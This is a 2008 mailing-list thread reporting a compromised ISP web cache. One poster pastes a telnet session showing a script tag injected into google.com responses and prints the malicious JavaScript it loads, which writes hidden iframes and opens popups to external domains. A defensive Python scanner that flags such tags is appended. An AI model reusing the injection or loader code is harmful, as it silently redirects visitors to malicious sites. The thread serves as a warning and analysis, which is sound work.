[General] FT Cache Compromise Details

Majed B. majedb at gmail.com
Fri Dec 5 00:08:14 +03 2008


That's just sad...

Does anyone know what kind of caching equipment they're using?

> --- On Thu, 12/4/08, Burhan Khalid <burhan at kuwaitnet.net> wrote:
>
>> From: Burhan Khalid <burhan at kuwaitnet.net>
>> Subject: [General] FT Cache Compromise Details
>> To: "General OpenSource Discussion" <general at oskw.org>
>> Date: Thursday, December 4, 2008, 4:41 PM
>> I don't think I need to say this, but do not click on
>> any links in this email.
>>
>> Salaam All:
>>
>>   Just as a reminder, as of this email date, the cache is
>> still compromised (see paste below).
>>
>> [burhan at t61p ~]$ telnet google.com 80
>> Trying 72.14.205.100...
>> Connected to google.com.
>> Escape character is '^]'.
>> GET / HTTP/1.1
>> Host: www.google.com
>>
>> HTTP/1.1 200 OK
>> Content-Type: text/html; charset=ISO-8859-1
>> Set-Cookie:
>> PREF=ID=08e985e2eb9bfbbe:TM=1228395740:LM=1228395740:S=6SIcev5-b4ZYec5K;
>> expires=Sat, 04-Dec-2010 13:02:20 GMT; path=/;
>> domain=.google.com
>>
>> <script language=javascript
>> src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>
>>                                                   16e2
>>
>> Apparently it's loading something from a Chinese website
>> (58.53.128.82), a javascript file, which does what normal
>> such exploits do - loads in an iframe content from another
>> compromised site, and opens popups:
>>
>> function Get(){
>> var Then = new Date()
>> Then.setTime(Then.getTime() + 1*40*60*1000)
>> var cookieString = new String(document.cookie)
>> var cookieHeader = "cainibi="
>> var beginPosition = cookieString.indexOf(cookieHeader)
>> if (beginPosition != -1){
>> } else
>> { document.cookie =
>> "cainibi=chongxinzuo;expires="+ Then.toGMTString()
>> document.write("<div
>> style=\"display:none\">");
>> document.write("<iframe src=http://se.c66a.cn/
>> width=0 height=0></iframe>");
>> window.open("http://liaobamm.com");
>>
>> }
>> }
>> document.write("<iframe
>> src=http://w.c66d.cn/logo.htm width=100
>> height=0></iframe>");
>> Get();
>>
>>
>> If anyone has an inside ear on FT, tell them to block
>> access at their firewall to the offending IPs. Hell, they
>> block Skype, why can't they block something I don't
>> want.
>>
>> Enjoy,
>> --
>> Burhan Khalid
>>
>> _______________________________________________
>> General mailing list
>> General at oskw.org
>> http://mail.oskw.org/mailman/listinfo/general_oskw.org



-- 
       Majed B.
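
The injected tag in the quoted paste hides its host behind percent-encoding. The following is an added example, not code from the thread or from either poster: it scans a response body for script/iframe tags whose src host is percent-encoded, off-site, or attached to a zero-size iframe. The function and class names, the `google.com` site argument, and the sample body (constructed from the tags quoted above plus two hypothetical same-site scripts) are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote


class ResourceScanner(HTMLParser):
    """Collect script/iframe tags with an absolute src and flag risky ones."""

    def __init__(self, site_domain):
        super().__init__()
        self.site_domain = site_domain.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        attr = dict(attrs)
        raw_host = urlsplit(attr.get("src") or "").hostname or ""
        if not raw_host:
            return  # relative or missing src: served by the site itself
        host = unquote(raw_host).lower()
        flags = []
        if "%" in raw_host:
            # Legitimate pages have no reason to percent-encode a hostname.
            flags.append("percent-encoded-host")
        if host != self.site_domain and not host.endswith("." + self.site_domain):
            flags.append("off-site")
        if tag == "iframe" and "0" in (attr.get("width"), attr.get("height")):
            flags.append("zero-size-iframe")
        if flags:
            self.findings.append((tag, host, flags))


def scan_body(body, site_domain):
    """Return (tag, decoded_host, flags) for every suspicious tag in body."""
    scanner = ResourceScanner(site_domain)
    scanner.feed(body)
    scanner.close()
    return scanner.findings


# Constructed sample: the two injected tags are copied from the paste above;
# /js/home.js and extern.js are hypothetical legitimate resources.
SAMPLE_BODY = (
    "<script language=javascript "
    "src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>\n"
    "<html><head><script src=/js/home.js></script></head>\n"
    "<body><iframe src=http://w.c66d.cn/logo.htm width=100 height=0></iframe>\n"
    '<script src="http://www.google.com/extern.js"></script></body></html>\n'
)

if __name__ == "__main__":
    for tag, host, flags in scan_body(SAMPLE_BODY, "google.com"):
        print(f"{tag:7} {host:12} {', '.join(flags)}")
```

Run against a response fetched through the cache and one fetched over a path that bypasses it; a finding present only in the cached copy points at the cache rather than the origin.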



